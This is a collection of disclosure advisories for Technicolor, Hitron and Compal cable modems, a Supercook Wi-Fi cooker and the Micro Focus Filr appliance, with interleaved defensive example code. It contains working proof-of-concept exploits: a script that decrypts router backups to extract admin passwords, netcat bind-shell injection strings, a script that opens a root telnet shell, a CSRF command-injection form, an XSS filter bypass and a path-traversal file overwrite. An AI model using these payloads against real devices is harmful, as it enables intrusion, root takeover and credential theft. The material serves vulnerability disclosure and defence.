'''
Technicolor TC7200 modem/router multiple vulnerabilities
--------------------------------------------------------
Platforms / Firmware confirmed affected:
- Technicolor TC7200, STD6.02.11
- Product page: http://www.technicolor.com/en/solutions-services/connected-home/broadband-devices/cable-modems-gateways/tc7200-tc7300
Vulnerabilities
---------------
Insecure session management
The web interface does not use cookies at all and does not check the IP
address of the client. Once an admin login has succeeded, every user on
the LAN can access the management interface.
Backup file encryption uses a fixed password
Technicolor fixed CVE-2014-1677 by encrypting the backup file with
AES. However, the encrypted backup file remains accessible without
authentication, and if no password is set in the web interface a
default password is used. So, if an attacker accesses the backup file
without authentication, no user-defined password protects it, and the backup file
can be decrypted.
Timeline
--------
- 2015.07.30: We sent some new issues affecting the Ubee router and other findings in Technicolor TC7200 and Cisco EPC3925 devices to UPC
- Between 2015.07.31 and 08.12 there were several e-mail and phone communications between technical persons from Liberty Global to clarify the findings
- 2015.08.19: UPC sent out advisory emails to its end users to change the default WiFi passphrase
- 2016.01.27: UPC Magyarorszag sent out a repeated warning to its end users about the importance of changing the default passphrases.
- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters
- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases.
POC
---
POC script is available to demonstrate the following problems [2]:
- Unauthenticated backup file access
- Backup file decryption
Recommendations
---------------
Since only the ISP can update the firmware, the only recommendation we can
make to users is to change the WiFi passphrase.
Credits
-------
This vulnerability was discovered and researched by Gergely Eberhardt
from SEARCH-LAB Ltd. (www.search-lab.hu)
References
----------
[1] http://www.search-lab.hu/advisories/secadv-20160720
[2] https://github.com/ebux/Cable-modems/tree/master/Technicolor
'''
#
# POC code for Technicolor TC7200
#
# Demonstrates the following vulnerabilities
# - Unauthenticated backup file access
# - Backup file decryption
#
# Credit: Gergely Eberhardt (@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu)
#
# Advisory: http://www.search-lab.hu/advisories/secadv-20150720
import sys
import requests
import struct
import binascii
from Crypto.Cipher import AES

class technicolor:
    def __init__(self, addr, port):
        self.addr = addr
        self.port = port
        self.s = requests.Session()

    def getUri(self, uri):
        return 'http://%s:%d/%s'%(self.addr,self.port,uri)

    def downloadBackupFile(self):
        # the backup file is served without any authentication
        r = self.s.get(self.getUri('goform/system/GatewaySettings.bin'))
        resp = ''
        for chunk in r:
            resp += chunk
        return resp

    def parseBackup(self, backup):
        # credentials follow the 'MLog' marker as length-prefixed
        # (big-endian 16-bit) name and password fields
        p = backup.find('MLog')
        if (p > 0):
            p += 6
            nh = struct.unpack('!H',backup[p:p+2])[0]
            name = backup[p+2:p+2+nh]
            p += 2+nh
            ph = struct.unpack('!H',backup[p:p+2])[0]
            pwd = backup[p+2:p+2+ph]
            return (name,pwd)
        return ('','')

    def decryptBackup(self, backup):
        # fixed key and ECB mode: no per-device or per-user secret is involved
        key = binascii.unhexlify('000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F')
        l = (len(backup)/16)*16
        cipher = AES.new(key, AES.MODE_ECB)
        plain = cipher.decrypt(backup[0:l])
        return plain

#------------------------------------
if (len(sys.argv) < 2):
    print 'technicolor_tc7200_poc.py addr [port]'
    sys.exit(1)

addr = sys.argv[1]
port = 80
if (len(sys.argv) == 3):
    port = int(sys.argv[2])

# create technicolor object
t = technicolor(addr, port)
backup = t.downloadBackupFile()
if (len(backup) > 0):
    open('test.enc', 'wb').write(backup)
    plain = t.decryptBackup(backup)
    open('test.dec', 'wb').write(plain)
    (name, pwd) = t.parseBackup(plain)
    if (name != ''):
        print 'admin name: %s, pwd: %s'%(name,pwd)
Hitron CGNV4 modem/router multiple vulnerabilities
--------------------------------------------------
Platforms / Firmware confirmed affected:
- Hitron CGNV4, 4.3.9.9-SIP-UPC
- Product page: http://www.hitrontech.com/en/cable_detail.php?id=62
Vulnerabilities
---------------
Insecure session management
The web interface uses insecure cookies, which can be brute-forced
easily (e.g. cookie: userid=0). If admin login is successful, the IP
address of the admin user is stored and everybody can access the
management interface from the same IP.
Missing CSRF protection
The web interface does not use any CSRF protection. If a valid
session exists, the attacker can modify any settings of the router. If
the default admin password was not changed, the attacker can also perform
a login and then modify any settings.
Authenticated command injection
The ping diagnostic function is vulnerable to system command injection,
because the parameters are checked only at the client side. Using the
following ping target, the attacker can gain local root access to the
device:
“google.com;nc -l -p 1337 -e /bin/sh;echo”.
Disclaimer
----------
We found these vulnerabilities within a very short time (3 hours),
and did not check many areas, such as:
- Command injections in other modules
- Buffer overflows
- User authentication
- Default SSID and passphrase
- Analysis of the backup file
- Device configuration (such as SNMP)
Timeline
--------
- 2015.10.16: Vulnerabilities found in the Hitron CGNV4 were reported to UPC Magyarorszag and Liberty Global
- 2016.01.27: UPC Magyarorszag sent out a repeated warning to its end users about the importance of changing the default passphrases.
- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters
- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases.
Recommendations
---------------
We do not know of any possible solution. The ISP should install a
firmware update once the fix is ready.
Credits
-------
This vulnerability was discovered and researched by Gergely Eberhardt
from SEARCH-LAB Ltd. (www.search-lab.hu)
References
----------
[1] http://www.search-lab.hu/advisories/secadv-20160720
Compal CH7465LG-LC modem/router multiple vulnerabilities
--------------------------------------------------------
The following vulnerabilities are the result of a quick check (~3 hours)
of the Mercury modem. We also performed a systematic, deeper evaluation of
this device, the results of which are described in a separate report [2] and advisory.
Platforms / Firmware confirmed affected:
- Compal CH7465LG-LC, CH7465LG-NCIP-4.50.18.13-NOSH
Vulnerabilities
---------------
Insecure session management
The web interface uses cookies, but they are not verified. Thus, if admin
login is successful, the IP address and the browser type of the admin
user are stored and everybody can access the management interface from
the same IP with the same user-agent.
Information leakage
Some information requests can be performed without authentication. For
example, an attacker can obtain the following pieces of information:
- Global settings (SW version, vendor name, etc.)
- CSRF token
- Event log
- LAN user table
- Ping response
Unauthenticated denial of service attack
A factory reset can be initiated without authentication with a simple POST
request to getter.xml.
Unauthenticated configuration changes
Some settings modifications can be performed without authentication, for
example the first install flag and the ping command.
Unauthenticated command injection
The ping diagnostic function is vulnerable to system command injection,
because parameters are checked only at the client side. Using the
following ping target, the attacker can gain local root access to the
device:
“token=<csrf_token>&fun=126&Type=0&Target_IP=127.0.0.1&Ping_Size=64;nc
-l -p 1337 -e /bin/sh;&Num_Ping=3&Ping_Interval=1”
Timeline
--------
- 2015.10.21: SEARCH-LAB received two sample boxes from the Compal Mercury devices from UPC Magyarorszag
- 2015.10.21: Within three hours we reported a remotely exploitable vulnerability on the device
- 2015.10.21: Liberty Global asked for a commercial proposal on executing an overall security evaluation of the Compal device.
- 2015.10.24: A proposal was sent to Liberty Global.
- 2015.11.09: Liberty Global asked to execute the evaluation as a pilot project without financial compensation.
- 2015.12.07: End Use Certificate for Dual-Use Items was asked from Liberty Global as the developer of the device is located in China.
- 2016.01.07: The 99-page-long Evaluation Report on Compal Mercury modem was sent to Liberty Global with the restriction that they are not allowed to forward it outside of the European Union until a signed End Use Certificate is received.
- 2016.01.07: First reaction to the report said: “Bloody hell, that is not a small document ;)”
- 2016.01.11: Liberty Global sent the signed End Use Certificate for Dual-Use Items to SEARCH-LAB
- 2016.01.27: UPC Magyarorszag sent out a repeated warning to its end users about the importance of changing the default passphrases.
- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters
- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases.
Recommendations
---------------
We do not know of any possible solution. The ISP should install a firmware update once the fix is ready.
Credits
-------
This vulnerability was discovered and researched by Gergely Eberhardt from SEARCH-LAB Ltd. (www.search-lab.hu)
References
----------
[1] http://www.search-lab.hu/advisories/secadv-20160720
[2] http://www.search-lab.hu/media/Compal_CH7465LG_Evaluation_Report_1.1.pdf
'''
Bellini/Supercook Wi-Fi Yumi SC200 - Multiple vulnerabilities
Reported By:
==================================
James McLean -
Primary: james dot mclean at gmail dot com
Secondary: labs at juicedigital dot net
Device Overview:
==================================
From http://www.supercook.me/en/supercook/articles/btmkm800x/
"The Bellini.SUPERCOOK Kitchen Master is much more than a multifunctional
kitchen machine. It has 13 functions so not only saves a huge amount of
time, it also incorporates the Yumi control module and its own recipe
collection, making it incredibly easy to use."
Vulnerability Overview:
==================================
Vuln1) Weak Username/Password for 'root' account.
Vuln2) Information disclosure, unauthenticated.
Vuln3) Remote arbitrary code execution.
CVE ID's
==================================
None assigned as yet.
Disclosure Timeline
==================================
2016-06-01: Vulnerability assessment commenced.
2016-07-04: Contacted Supercook.me support via Web Contact. No response.
2016-07-12: Contacted Supercook.me support via Web Contact. No response.
2016-07-12: Contacted Supercook Australia via Facebook. Supercook responded, saying they will view the support request. No further response received.
2016-07-19: Contacted Supercook Australia via Facebook. No response.
2016-07-21: Posted security assessment to vortex.id.au.
2016-07-22: Mitre contacted, CVE ID's requested.
It is with regret, but ultimately due to my concern for the community
that own these devices, that due to lack of communication I am disclosing
these vulnerabilities without the involvement of the vendor. I sincerely hope
that the vendor can resolve these issues in a timely manner.
I intend no malice by releasing these vulnerabilities, and only wish to
inform the community so appropriate steps may be taken by the owners of
these devices.
Due to the nature of the firmware on the device, these issues are not likely
caused by the vendor themselves.
Please do not use the information presented here for evil.
Affected Platforms:
==================================
Bellini/Supercook Wi-Fi Yumi SC200 - Confirmed affected: Vuln1, Vuln2, Vuln3.
Bellini/Supercook Wi-Fi Yumi SC250 - Likely affected, Vuln1, Vuln2, Vuln3, as
same firmware is used.
As the Wi-fi Yumi firmware appears to be based on a stock firmware image
used on a number of other commodity 'IoT' devices, the vulnerabilities
described here are very likely to affect other devices with similar or
the same firmware.
--
Vuln1 Details:
==================================
Weak Username/Password for Root-level account.
Username: super
Password: super
These credentials provide access to the built in FTP server and web
administration interface. We did not attempt any more than a cursory
connection to the FTP server with these details.
According to the details disclosed in Vuln2, an additional account is present
on the device with the following credentials:
Username: admin
Password: AlpheusDigital1010
With the exception of a cursory check of the built in FTP service (which
failed for these credentials), we did not attempt to access the device with
these credentials.
Vuln1 Notes:
==================================
We did not attempt to change or ascertain if it was possible to change these
access credentials; as Vuln2 completely negates any change made.
Vuln1 Mitigation:
==================================
Isolate the Supercook Wi-fi Yumi from any other Wireless network.
Revert to the non-wifi Yumi controller.
--
Vuln2 Details:
==================================
Information disclosure, unauthenticated.
Device URL: http://10.10.1.1/Setting.chipsipcmd
The device offers, via its built-in webserver, a full list of all configuration
parameters. This list includes the above-mentioned root account
username and password, and the password of the parent connected wifi network.
All details are in plain text, transmitted as key-value pairs, making
retrieval, recovery and use of all configuration information trivial.
This interface is also reachable from the parent wi-fi network via the
DHCP-assigned IPv4 address.
Vuln2 Notes:
==================================
Example data returned:
DEF_IP_ADDR=10.10.1.1
DEF_SUBNET_MASK=255.255.255.0
...
DEF_SUPER_NAME="super"
DEF_SUPER_PASSWORD="super"
DEF_USER_NAME="admin"
DEF_USER_PASSWORD="AlpheusDigital1010"
...
Vuln2 Mitigation:
==================================
Isolate the Supercook Wi-fi Yumi from any other Wireless network, only using
the mobile application to upload recipes, then disconnect from the device and
connect your mobile device to a trusted network once again to access the
internet once again.
Revert to the non-wifi Yumi controller.
The vendor should establish a method of authentication to the device from the
various mobile applications available, and transport any configuration in an
encrypted format using keys which are not generally available or easily
discoverable.
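Vuln2 above is a key-value dump. The following Python audit script is an added example, not part of this advisory or of the vendor's firmware: it parses a dump in that format and flags secrets that are present in plain text, that equal their account name, or that are in a short list of common defaults. The sample dump is constructed from the fields shown above; the super/super pair is from the advisory, the admin password and Wi-Fi passphrase values are placeholders, and the key-name patterns and default list are assumptions of the example.

```python
import re

# Constructed sample in the format of the Setting.chipsipcmd dump quoted above.
# The super/super pair is taken from the advisory; the other secret values are
# placeholders, not real device values.
SAMPLE_DUMP = """\
DEF_IP_ADDR=10.10.1.1
DEF_SUBNET_MASK=255.255.255.0
...
DEF_SUPER_NAME="super"
DEF_SUPER_PASSWORD="super"
DEF_USER_NAME="admin"
DEF_USER_PASSWORD="placeholder-admin-password"
WIFI_SSID="HomeNet"
WIFI_PSK="placeholder-wifi-passphrase"
...
"""

_LINE_RE = re.compile(r"^\s*([A-Za-z0-9_.]+)\s*=\s*(.*?)\s*$")
# Assumed: key names whose value is a secret end in one of these words.
_SECRET_KEY_RE = re.compile(r"(PASSWORD|PASSWD|PASS|PSK|SECRET|KEY)$", re.I)
# Assumed short list of vendor defaults worth flagging on sight.
COMMON_DEFAULTS = {"", "super", "admin", "password", "root", "1234", "12345678"}


def parse_config_dump(text):
    """Parse KEY=value lines (value optionally "quoted") into a dict; skips
    blanks, comments and the '...' elision markers used in the excerpt."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line == "...":
            continue
        m = _LINE_RE.match(line)
        if not m:
            continue
        key, val = m.group(1), m.group(2)
        if len(val) >= 2 and val[0] == val[-1] and val[0] in "\"'":
            val = val[1:-1]
        cfg[key] = val
    return cfg


def audit_config(cfg):
    """Return (key, finding) pairs for every secret-bearing key."""
    findings = []
    for key, val in cfg.items():
        if not _SECRET_KEY_RE.search(key):
            continue
        # Any secret in an unauthenticated, unencrypted dump is a finding by itself.
        findings.append((key, "secret present in plaintext"))
        if val.lower() in COMMON_DEFAULTS:
            findings.append((key, "common default or empty value"))
        # Pair DEF_SUPER_PASSWORD with its sibling DEF_SUPER_NAME and compare.
        name_key = re.sub(r"(PASSWORD|PASSWD|PASS)$", "NAME", key, flags=re.I)
        name = cfg.get(name_key)
        if name_key != key and name is not None and name.lower() == val.lower():
            findings.append((key, f"password equals username {name!r}"))
    return findings


if __name__ == "__main__":
    for key, finding in audit_config(parse_config_dump(SAMPLE_DUMP)):
        print(f"{key}: {finding}")
```

The first finding ("secret present in plaintext") fires for every secret regardless of its value, which is the point of Vuln2: the transport, not the password strength, is the defect the vendor has to fix.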
--
Vuln3 Details:
==================================
Remote arbitrary code execution.
Device URL: http://10.10.1.1/syscmd.asp
The device offers a built-in web shell which, once authenticated using the
details discovered in Vuln2, allows the execution of any command the device
can execute, as the built-in webserver runs as the root user.
It is possible to execute a command using this interface that would create
any file in any location. This would allow an attacker to establish persistence.
Additionally, the built-in busybox binary includes the 'telnetd' applet,
so the relevant command can be executed to start a telnet daemon remotely.
The running daemon then requires no authentication to connect, and runs as
the root account.
Vuln3 Mitigation:
==================================
Isolate the Supercook Wi-fi Yumi from any other Wireless network.
Revert to the non-wifi Yumi controller.
Remove or prevent access to /syscmd.asp and /goform/formSysCmd scripts (Please
mind your warranty if you modify the files on the device).
The vendor should disable any and all commands on the device and scripts in
the web interface which are not specifically required for the normal
functionality of the device or its communication with control apps.
In this instance, the vendor should REMOVE the page '/syscmd.asp' and also
/goform/formSysCmd which processes commands submitted via syscmd.asp to prevent
arbitrary commands from being executed.
Additionally, busybox should be recompiled such that the 'telnetd' option is
no longer available to be executed.
--
Vuln1/Vuln2/Vuln3 Risks:
==================================
Weak and easily discoverable root credentials combined with easily accessed
remote shell functionality is a dangerous combination. These vulnerabilities
could allow any sufficiently advanced malware to become persistent in a LAN
and re-infect hosts at will (advanced crypto-locker style malware comes to
mind), capture and exfiltrate data on either Wireless network the device is
connected to, MITM any traffic routed through the device, or other as yet
unknown attack vectors.
Additionally, as full root access is easily obtainable, it may be possible
for an attacker to cause the cooking functionality to behave erratically or
possibly even dangerously due to the built in spinning blades and heating
elements. While we ultimately did not attempt to control these aspects of the
device due to the fact that it makes our dinner most nights, these risks are
worth raising.
This vulnerability assessment should not be considered an exhaustive list
of all vulnerabilities the device may have. Due to time constraints we were
unable to invest the required time to discover and document all issues. Due to
the nature of the firmware on the device, most of these have likely been
discovered in other products at various times, this item may even duplicate
another from a similar device.
Notes:
==================================
No security assessment of code used for control of cooker functionality was
undertaken; as this does not, in my opinion, rate as seriously as the other
vulnerabilities discovered and disclosed here. However, it should be noted,
that with the root access that is VERY easily obtained, it may be possible for
an attacker to cause the cooking functionality of the machine to behave
erratically or even dangerously due to the built in spinning blades and heating
elements. Further to this, a malicious partner or offspring may intentionally
sabotage dinner, if he/she would prefer to eat takeout.
No attempt was made to connect to or manipulate files on the built in Samba
shares, however given the weak credentials sufficiently advanced malware may be
able to use these shares to establish persistence.
The 'Bellini' name may be regional, our device was procured in Australia and
as such may or may not have a different name in other countries.
A full, detailed, rundown and commentary is available at
https://www.vortex.id.au/2016/07/bellini-supercook-yumi-wi-fi-the-insecurity-perspective/
Vuln3 Proof of Concept:
==================================
'''
#!/usr/bin/env python
import urllib
import urllib2
from subprocess import call
# Connect to the device's wifi network, then run.
# Root access will be provided.
url = 'http://10.10.1.1/goform/formSysCmd'
cmd = 'busybox telnetd -l /bin/sh'
username = 'super'
password = 'super'
# setup the password handler
basicauth = urllib2.HTTPPasswordMgrWithDefaultRealm()
basicauth.add_password(None, url, username, password)
authhandler = urllib2.HTTPBasicAuthHandler(basicauth)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
# Connect to the device, send the data
values = {
'sysCmd': cmd,
'apply': 'Apply',
'submit-url': '/syscmd.asp'
}
data = urllib.urlencode(values)
pagehandle = urllib2.urlopen(url, data)
# Connect to Telnet.
call(["telnet","10.10.1.1"])
# Pwnd.
# End of document.
SEC Consult Vulnerability Lab Security Advisory < 20160725-0 >
=======================================================================
title: Multiple vulnerabilities
product: Micro Focus (former Novell) Filr Appliance
vulnerable version: Filr 2 <=2.0.0.421, Filr 1.2 <= 1.2.0.846
fixed version: Filr 2 v2.0.0.465, Filr 1.2 v1.2.0.871
CVE number: CVE-2016-1607, CVE-2016-1608, CVE-2016-1609
CVE-2016-1610, CVE-2016-1611
impact: critical
homepage: https://www.novell.com/products/filr/
found: 2016-05-23
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Unlike other mobile file access and collaborative file sharing solutions, Micro
Focus Filr has been designed with the enterprise in mind, resulting in less
administration, better security and more productive users."
URL: https://www.novell.com/products/filr/
Business recommendation:
------------------------
During a very quick security check several vulnerabilities with high impact
have been discovered. SEC Consult recommends applying the patches
provided by Micro Focus immediately to address these issues.
Please note that, since SEC Consult did not conduct a thorough technical security
check, SEC Consult cannot make a statement regarding the overall security of the
Micro Focus Filr appliance.
Vulnerability overview/description:
-----------------------------------
During a quick security check several vulnerabilities have been identified that
ultimately allow an attacker to completely compromise the appliance:
1) Cross Site Request Forgery (CSRF) - CVE-2016-1607
Several functions within the appliance's administrative interface lack protection
against CSRF attacks. This allows an attacker who targets an authenticated
administrator to reconfigure the appliance.
2) OS Command Injection - CVE-2016-1608
The appliance administrative interface allows an authenticated attacker to
execute arbitrary operating system commands. Please note that an attacker can
combine this vulnerability with vulnerability #1. In this scenario, an attacker
does not need to be authenticated.
3) Insecure System Design
The appliance uses a Jetty application server to provide the appliance
administration interface. This application server is started as the superuser
"root". Please note that combined with vulnerability #1 and #2 an attacker can
run commands as the superuser "root" without the need for any authentication.
For vendor remark on #3 see solution section.
4) Persistent Cross-Site Scripting - CVE-2016-1609
The Filr web interface uses a blacklist filter to try to strip any JavaScript
code from user input. However, this filter can be bypassed to persistently
inject JavaScript code into the Filr web interface.
5) Missing Cookie Flags
The httpOnly cookie flag is not set for any of the session cookies set by either
the administrative appliance web interface or the Filr web interface. Please note
that combined with vulnerability #4 an attacker can steal session cookies of
both the appliance administration interface and the Filr web interface (since
cookies are shared across ports).
For vendor remark on #5 see solution section.
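Insecure session handling recurs throughout this collection: the Technicolor interface binds no session at all, the Hitron and Compal devices bind it to the client IP (and User-Agent) with guessable cookies, and items #1 and #5 above describe missing CSRF protection and missing cookie flags in Filr. The following Python example is added here and is not taken from any of the advisories or products: a minimal session store and state-change check with random session identifiers, HttpOnly/Secure/SameSite cookie attributes, a session-bound CSRF token and an Origin check. The host name router.local, the cookie name, the in-memory store and the per-process CSRF key are assumptions of the example.

```python
import hashlib
import hmac
import secrets
import time
from urllib.parse import urlparse

# Assumptions for this example: the management UI is served over HTTPS from
# ALLOWED_HOST, and CSRF_SECRET is a per-process key rotated on restart.
ALLOWED_HOST = "router.local"
SESSION_COOKIE = "SESSIONID"
CSRF_SECRET = secrets.token_bytes(32)


class SessionStore:
    """Sessions are keyed only by a random cookie value, never by client IP or
    User-Agent: those are shared by every host behind the same NAT or LAN."""

    def __init__(self, ttl_seconds=900):
        self._sessions = {}
        self.ttl = ttl_seconds

    def create(self, user, now=None):
        now = time.time() if now is None else now
        sid = secrets.token_urlsafe(32)  # 256 bits; nothing like userid=0 to enumerate
        self._sessions[sid] = (user, now + self.ttl)
        return sid

    def lookup(self, sid, now=None):
        now = time.time() if now is None else now
        rec = self._sessions.get(sid)
        if rec is None:
            return None
        user, expires = rec
        if now > expires:
            del self._sessions[sid]
            return None
        return user


def set_cookie_header(sid):
    # HttpOnly keeps script away from the cookie, Secure keeps it off plain HTTP,
    # SameSite=Strict stops browsers attaching it to cross-site requests.
    return f"Set-Cookie: {SESSION_COOKIE}={sid}; Path=/; HttpOnly; Secure; SameSite=Strict"


def parse_cookie_header(value):
    jar = {}
    for part in value.split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            jar[k] = v
    return jar


def csrf_token_for(sid):
    # Bound to the session: a cross-site page can neither read the HttpOnly
    # cookie nor the server key, so it cannot produce this value.
    return hmac.new(CSRF_SECRET, sid.encode(), hashlib.sha256).hexdigest()


def _same_origin(headers):
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    u = urlparse(src)
    return u.scheme == "https" and u.hostname == ALLOWED_HOST


def authorize_state_change(store, headers, form):
    """Checks every state-changing request must pass before it touches
    configuration. headers/form are plain dicts. Returns (ok, reason)."""
    jar = parse_cookie_header(headers.get("Cookie", ""))
    sid = jar.get(SESSION_COOKIE)
    if not sid or store.lookup(sid) is None:
        return False, "no valid session cookie"
    if not hmac.compare_digest(form.get("csrf_token", ""), csrf_token_for(sid)):
        return False, "missing or wrong CSRF token"
    if not _same_origin(headers):
        return False, "cross-origin request"
    return True, "ok"
```

A forged cross-site POST of the kind shown in the proof of concept for #1 arrives with the victim's cookie attached by the browser but without the token, and is refused at the second check; with SameSite=Strict the cookie is not even attached.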
6) Authentication Bypass - CVE-2016-1610
An unauthenticated attacker is able to upload email templates.
7) Path Traversal - CVE-2016-1610
The functionality that allows an administrator to upload email templates fails
to restrict the directory the templates are uploaded to. Please note that
combined with vulnerability #6 an attacker is able to upload arbitrary files with
the permissions of the system user "wwwrun".
8) Insecure File Permissions - CVE-2016-1611
A file that is run upon system user login is world-writable. This allows a local
attacker with restricted privileges to inject commands that are executed
as privileged users as soon as they log into the system. Please note that
combined with vulnerabilities #6 and #7 an unauthenticated attacker can inject
commands that are executed as privileged system users (e.g. root) using the Filr
web interface.
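Items #7 and #8 above are both file-handling defects: an upload name that is used as a path, and a login-time script that is world-writable. The following Python example is an addition, not Filr code: resolve_template_path rejects any client-supplied name containing path components or dot-segments and re-checks the resolved path, and world_writable_files is the audit an administrator can run over directories such as /etc/profile.d whose contents are executed at login. TEMPLATE_DIR and the temporary-directory fixture are assumptions of the example.

```python
import os
import stat
import tempfile
from pathlib import Path

# Assumed location for uploaded e-mail templates; it need not exist for the
# name check to run.
TEMPLATE_DIR = "/var/opt/example-app/email-templates"


def resolve_template_path(requested_name, base_dir=TEMPLATE_DIR):
    """Map a client-supplied file name to a path inside base_dir, or raise.

    Only a bare file name is accepted: any directory separator or dot-segment
    (../../../../etc/profile.d/vainit.sh) is rejected before a path is built."""
    if not requested_name or os.path.basename(requested_name) != requested_name:
        raise ValueError(f"file name must not contain path components: {requested_name!r}")
    if requested_name in (".", "..") or requested_name.startswith("."):
        raise ValueError(f"dot-file or dot-segment rejected: {requested_name!r}")
    base = Path(base_dir).resolve()
    candidate = (base / requested_name).resolve()
    # Defence in depth: a symlink inside base_dir could still point outside it.
    if base not in candidate.parents:
        raise ValueError("resolved path escapes the template directory")
    return str(candidate)


def is_safe_template_name(requested_name, base_dir=TEMPLATE_DIR):
    try:
        resolve_template_path(requested_name, base_dir)
        return True
    except ValueError:
        return False


def world_writable_files(directory):
    """Regular files in directory that any local user may modify (o+w)."""
    hits = []
    for entry in sorted(os.listdir(directory)):
        path = os.path.join(directory, entry)
        st = os.lstat(path)
        if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
            hits.append(entry)
    return hits


def demo_world_writable_scan():
    """Constructed fixture: a temp dir with one o+w script and one sane one,
    standing in for /etc/profile.d; returns the names the audit flags."""
    d = tempfile.mkdtemp()
    for name, mode in (("vainit.sh", 0o666), ("sane.sh", 0o644)):
        p = os.path.join(d, name)
        with open(p, "w") as fh:
            fh.write("# login-time script\n")
        os.chmod(p, mode)
    return world_writable_files(d)
```

Checking the name rather than trying to strip "../" sequences is deliberate: a filter that removes "../" once can be bypassed by "....//", whereas refusing anything that is not a bare file name has no such edge cases.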
Proof of concept:
-----------------
1, 2, 3)
The following HTML fragment demonstrates that using a CSRF attack (#1) system
commands can be injected (#2) that are executed as the user root (#3):
----- snip -----
<html>
<body>
<form action="https://<host>:9443/vaconfig/time" method="POST">
<input type="hidden" name="ntpServer" value="0.novell.pool.ntp.org 1.novell.pool.ntp.org';id>/tmp/test;'" />
<input type="hidden" name="region" value="europe" />
<input type="hidden" name="timeZone" value="Europe/Vienna" />
<input type="hidden" name="utc" value="true" />
<input type="hidden" name="_utc" value="on" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
----- snip -----
4)
The following string demonstrates how the XSS filter can be circumvented:
<img src='>' onerror='alert(1)'>
This string can e.g. be used by a restricted user in the "phone" field of the
user profile. The script is executed by anyone viewing the profile (e.g. admins).
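The string in 4) above works because it opens an attribute value with a quote and places a '>' inside it, so a filter that hunts for tags with a regular expression stops early while the browser's parser does not. The Python example below is an addition, not Filr's filter or rendering code: an assumed blacklist of the kind the advisory describes (stripping only <script> elements and javascript: URLs), the same field rendered with contextual HTML escaping instead, and a stdlib HTMLParser-based check that lists the inline event handlers a browser would actually wire up in each rendering.

```python
import html
import re
from html.parser import HTMLParser

# An assumed blacklist of the kind the advisory describes (not Filr's actual
# filter): it strips <script> elements and "javascript:" URLs and nothing else.
_BLACKLIST = (
    re.compile(r"<script\b.*?</script\s*>", re.I | re.S),
    re.compile(r"javascript:", re.I),
)


def blacklist_filter(value):
    for pattern in _BLACKLIST:
        value = pattern.sub("", value)
    return value


def render_phone_field_blacklist(value):
    """The pattern the advisory faults: filter on input, emit raw on output."""
    return f"<td>{blacklist_filter(value)}</td>"


def render_phone_field_escaped(value):
    """Contextual output encoding: every character with meaning in an HTML text
    node or attribute becomes an entity, so no tag or attribute can be created
    whatever the input looked like."""
    return f"<td>{html.escape(value, quote=True)}</td>"


class _EventHandlerFinder(HTMLParser):
    """Collects (tag, attribute) pairs for inline on* handlers, using the same
    tolerant attribute parsing a browser applies (quoted values may contain '>')."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.hits.append((tag, name))

    handle_startendtag = handle_starttag


def event_handlers_in(fragment):
    parser = _EventHandlerFinder()
    parser.feed(fragment)
    parser.close()
    return parser.hits
```

The blacklist leaves the advisory's string untouched because it contains neither <script> nor javascript:, and the rendered cell then carries a live onerror handler; the escaped rendering carries none. Output encoding at the point of use, not input filtering, is the fix.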
5)
None of the session cookies are set with the httpOnly flag.
6, 7, 8)
The following Java fragment demonstrates how an unauthenticated attacker (#6)
can overwrite a file in the filesystem (#7 & #8) that is executed upon user login
of e.g. the root user:
----- snip -----
String sessionCookie = "sectest";
String host = "http://<host>/";
ProxySettings settings = new ProxySettings();
HttpCookie cookie = new HttpCookie("JSESSIONID", sessionCookie);
settings.setCookieManager(new CookieManager());
settings.getCookieManager().getCookieStore().add(new URI(host), cookie);
settings.setModuleBaseUrl(host + "ssf/gwt/");
settings.setRemoteServiceRelativePath("gwtTeaming.rpc");
settings.setPolicyName("338D4038939D10E7FC021BD64B318D99");
GwtRpcService svc = SyncProxy.createProxy(GwtRpcService.class, settings);
VibeXsrfToken token = new VibeXsrfToken(
StringUtils.toHexString(Md5Utils.getMd5Digest(sessionCookie.getBytes())));
((HasRpcToken) svc).setRpcToken(token);
String fileName = "../../../../etc/profile.d/vainit.sh";
FileBlob fileBlob = new FileBlob(ReadType.TEXT, fileName, "", 1l, 4, 1l, false, 4l);
fileBlob.setBlobDataString("id > /tmp/profiledtest\n");
BinderInfo folderInfo = new BinderInfo();
folderInfo.setBinderId((long) 1);
folderInfo.setBinderType(BinderType.WORKSPACE);
folderInfo.setWorkspaceType(WorkspaceType.EMAIL_TEMPLATES);
VibeRpcCmd cmd = new UploadFileBlobCmd(folderInfo, fileBlob, true);
HttpRequestInfo ri = new HttpRequestInfo();
svc.executeCommand(ri, cmd);
----- snip -----
Vulnerable / tested versions:
-----------------------------
The version 2.0.0.421 of Micro Focus Filr was found to be vulnerable. This version
was the latest version at the time of the discovery.
According to the vendor, Filr 1.2 is also vulnerable.
Vendor contact timeline:
------------------------
2016-05-23: Sending encrypted advisory to security@novell.com, Setting latest
possible release date to 2016-07-12
2016-05-24: Initial response from Micro Focus: forwarded the information to Filr
engineering team
2016-06-13: Micro Focus releases patch to address issue #8
2016-06-14: Requested status update
2016-06-14: Micro Focus expects release of the patches in early July
2016-06-30: Asking for status update, answer of Micro Focus
2016-07-06: Micro Focus needs more time to patch issues, release re-scheduled for 15th
